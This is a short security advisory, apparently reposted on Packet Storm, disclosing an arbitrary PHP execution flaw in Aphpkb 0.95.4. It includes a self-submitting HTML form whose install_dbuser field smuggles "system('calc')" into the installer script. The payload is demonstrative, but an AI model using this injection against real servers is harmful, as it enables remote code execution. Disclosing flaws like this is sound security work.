Aphpkb version 0.95.4 suffers from an arbitrary php code execution vulnerability.
77c1922b309a0b397c6fedf8d3332918d5581d34dafc2bcd2b93e1a9478841de<!------------------------------------------------------------------------
# Software................Aphpkb 0.95.4
# Vulnerability...........Arbitrary PHP Execution
# Threat Level............Very Critical (5/5)
# Download................http://aphpkb.sourceforge.net/
# Discovery Date..........5/18/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --PoC-->
<!-- Access any page after submitting this form -->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/aphpkb/install/step5.php">
<input type="hidden" name="install_dbuser" value="');system('calc');//" />
<input type="submit" name="submit" />
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed